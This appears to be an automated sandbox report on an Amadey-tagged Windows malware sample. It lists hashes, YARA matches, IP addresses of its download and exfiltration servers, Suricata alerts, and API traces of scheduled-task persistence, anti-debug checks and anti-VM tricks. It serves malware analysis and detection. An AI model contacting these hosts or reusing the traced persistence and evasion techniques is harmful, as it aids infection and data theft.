Summary | ZeroBOX

random.exe

Generic Malware Amadey UPX Malicious Library Downloader HTTP ScreenShot Create Service KeyLogger Internet API DGA Hijack Network Http API persistence FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential P2P AntiDebug AntiVM
Category Machine Started Completed
FILE s1_win7_x6401 Feb. 11, 2025, 10:39 a.m. Feb. 11, 2025, 10:47 a.m.
Size 938.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 655ea6038564b40a3c583e516c9033d3
SHA256 31539950849dc368724cfd1de99fe7be5367be6e48812eca784ba3acb9752d39
CRC32 8B3FA4B5
ssdeep 24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8ayIF:zTvC/MTQYxsWR7ayI
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.215.113.16 Active Moloch
185.215.113.43 Active Moloch
185.215.113.75 Active Moloch
62.210.113.223 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.215.113.16:80 -> 192.168.56.101:49167 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 192.168.56.101:49167 -> 185.215.113.16:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.101:49167 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.16:80 -> 192.168.56.101:49167 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.101:49167 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.43:80 -> 192.168.56.101:49172 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 185.215.113.75:80 -> 192.168.56.101:49173 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 192.168.56.101:49173 -> 185.215.113.75:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.75:80 -> 192.168.56.101:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 185.215.113.75:80 -> 192.168.56.101:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.75:80 -> 192.168.56.101:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.75:80 -> 192.168.56.101:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.75:80 -> 192.168.56.101:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.75:80 -> 192.168.56.101:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 185.215.113.43:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49173 -> 185.215.113.75:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "X0P6emaCZCT" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Challenged=M
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: XfAp-Unified-Librarian-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'XfAp-Unified-Librarian-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: XAKAhead-Winter-Bestiality-Courtesy-Sorted-Essays-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'XAKAhead-Winter-Bestiality-Courtesy-Sorted-Essays-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: TrJnEllen-Ways-Geometry-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'TrJnEllen-Ways-Geometry-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: chhProjected-Citizens-Exclusion-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'chhProjected-Citizens-Exclusion-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: fAHuRand-Site-Inclusion-Model-Consideration-Nov-Advances-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'fAHuRand-Site-Inclusion-Model-Consideration-Nov-Advances-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: rvdValidation-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'rvdValidation-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: dnqBaby-Media-Casa-Vietnam-Probability-Deutsche-Gradually-Terminology-Subscription-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'dnqBaby-Media-Casa-Vietnam-Probability-Deutsche-Gradually-Terminology-Subscription-' is not recognized as an internal or external command, operable program or
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Set
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Hwy=m
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: rqSpam-Printable-Ceremony-Richmond-Priced-Interests-Additional-Sprint-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'rqSpam-Printable-Ceremony-Richmond-Priced-Interests-Additional-Sprint-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: nHRPink-Supplemental-Villas-Harassment-Focal-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'nHRPink-Supplemental-Villas-Harassment-Focal-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: yXbDraws-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'yXbDraws-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ZrXProcesses-Er-Collector-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'ZrXProcesses-Er-Collector-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: JPQxReveal-Dow-Unavailable-Southern-Fixes-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'JPQxReveal-Dow-Unavailable-Southern-Fixes-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: xwLSimultaneously-
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'xwLSimultaneously-' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: pYCUGospel-Organize-Sure-Er-Projector-Growth-Ascii-Moisture-Qualified-
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341218
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00340f18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341b98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00341b98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x30e0b9
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 3203257
exception.address: 0xbce0b9
registers.esp: 2685944
registers.edi: 0
registers.eax: 1
registers.ebp: 2685960
registers.edx: 14065664
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 c6 4b b6 36 3b 55 51 c7 04 24 aa 84 7f 7b
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x6d569
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 447849
exception.address: 0x92d569
registers.esp: 2685908
registers.edi: 1968898280
registers.eax: 32672
registers.ebp: 3999641620
registers.edx: 9175040
registers.ebx: 0
registers.esi: 9620876
registers.ecx: 1969094656
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 52 e9 48 03 00 00 89 14 24 ba 80 1d 57 13
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x6cf61
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 446305
exception.address: 0x92cf61
registers.esp: 2685912
registers.edi: 1968898280
registers.eax: 32672
registers.ebp: 3999641620
registers.edx: 9175040
registers.ebx: 0
registers.esi: 9653548
registers.ecx: 1969094656
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 89 04 24 52 89 e2 81 c2 04 00 00 00 55 e9
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x6d67e
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 448126
exception.address: 0x92d67e
registers.esp: 2685912
registers.edi: 1968898280
registers.eax: 234729
registers.ebp: 3999641620
registers.edx: 9175040
registers.ebx: 4294937840
registers.esi: 9653548
registers.ecx: 1969094656
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 8d 12 19 48 89 34 24 e9 c7 fb ff ff 68 9d
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x6e81a
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 452634
exception.address: 0x92e81a
registers.esp: 2685912
registers.edi: 1968898280
registers.eax: 27932
registers.ebp: 3999641620
registers.edx: 0
registers.ebx: 1259
registers.esi: 9628590
registers.ecx: 583485246
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 2c 24 e9 fd fb ff ff c1 e1 08 81
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1e7c1e
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 1997854
exception.address: 0xaa7c1e
registers.esp: 2685912
registers.edi: 0
registers.eax: 27905
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 2031647
registers.esi: 11173312
registers.ecx: 146665
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb bb b5 51 7d 3f f7 d3 43 52 e9 7c 01 00 00 58
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1e8cb4
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2002100
exception.address: 0xaa8cb4
registers.esp: 2685912
registers.edi: 11204764
registers.eax: 28067
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 2031647
registers.esi: 11173312
registers.ecx: 1325798793
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 89 e7 81 c7 04 00 00 00 81 ef 04 00 00 00
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1e91d7
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2003415
exception.address: 0xaa91d7
registers.esp: 2685912
registers.edi: 11179284
registers.eax: 28067
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 0
registers.esi: 11173312
registers.ecx: 1549541099
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 89 14 24 51 68 43 4a e1 5b 59 81 c9 93 1c
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f1375
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2036597
exception.address: 0xab1375
registers.esp: 2685912
registers.edi: 4141225
registers.eax: 4294938564
registers.ebp: 3999641620
registers.edx: 1114345
registers.ebx: 11179310
registers.esi: 0
registers.ecx: 11240389
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 57 89 0c 24 54 59 83 ec
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f6247
exception.instruction: in eax, dx
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2056775
exception.address: 0xab6247
registers.esp: 2685904
registers.edi: 4141225
registers.eax: 1447909480
registers.ebp: 3999641620
registers.edx: 22104
registers.ebx: 1969033397
registers.esi: 11215821
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f5d17
exception.address: 0xab5d17
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc000001d
exception.offset: 2055447
registers.esp: 2685904
registers.edi: 4141225
registers.eax: 1
registers.ebp: 3999641620
registers.edx: 22104
registers.ebx: 0
registers.esi: 11215821
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 4d 2a 2d 12 01
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f80f8
exception.instruction: in eax, dx
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2064632
exception.address: 0xab80f8
registers.esp: 2685904
registers.edi: 4141225
registers.eax: 1447909480
registers.ebp: 3999641620
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 11215821
registers.ecx: 10
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 14 fa ff ff bd e9 7a ff 7f 56 be 7e 13 7b
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1fb5d7
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2078167
exception.address: 0xabb5d7
registers.esp: 2685908
registers.edi: 11251372
registers.eax: 30798
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 9666765
registers.esi: 10
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 c0 ff 34 38 8b 34 24 50 51 89 e1 e9 54 01
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1fb05c
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2076764
exception.address: 0xabb05c
registers.esp: 2685912
registers.edi: 11282170
registers.eax: 30798
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 9666765
registers.esi: 10
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 c7 04 24 1c 09 63 2c 89 04 24 51 b9 26 84
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1fb647
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2078279
exception.address: 0xabb647
registers.esp: 2685912
registers.edi: 11282170
registers.eax: 4294938964
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 9666765
registers.esi: 3001122912
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: cd 01 eb 00 f9 64 8f 05 00 00 00 00 66 81 d2 5a
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1fba2e
exception.instruction: int 1
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000005
exception.offset: 2079278
exception.address: 0xabba2e
registers.esp: 2685872
registers.edi: 0
registers.eax: 2685872
registers.ebp: 3999641620
registers.edx: 2474553436
registers.ebx: 11254571
registers.esi: 0
registers.ecx: 109257438
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 d2 ff 34 16 8b 1c 24 83 ec 04 89 04 24 53
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x202685
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2107013
exception.address: 0xac2685
registers.esp: 2685912
registers.edi: 11282170
registers.eax: 32110
registers.ebp: 3999641620
registers.edx: 654654
registers.ebx: 9666765
registers.esi: 11313933
registers.ecx: 11274075
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb b8 a6 ce dd 7f 51 e9 cc 01 00 00 33 04 24 31
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20266f
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2106991
exception.address: 0xac266f
registers.esp: 2685912
registers.edi: 11282170
registers.eax: 32110
registers.ebp: 3999641620
registers.edx: 4294937768
registers.ebx: 1501522
registers.esi: 11313933
registers.ecx: 11274075
1 0 0

__exception__

stacktrace:

        
      
      
      
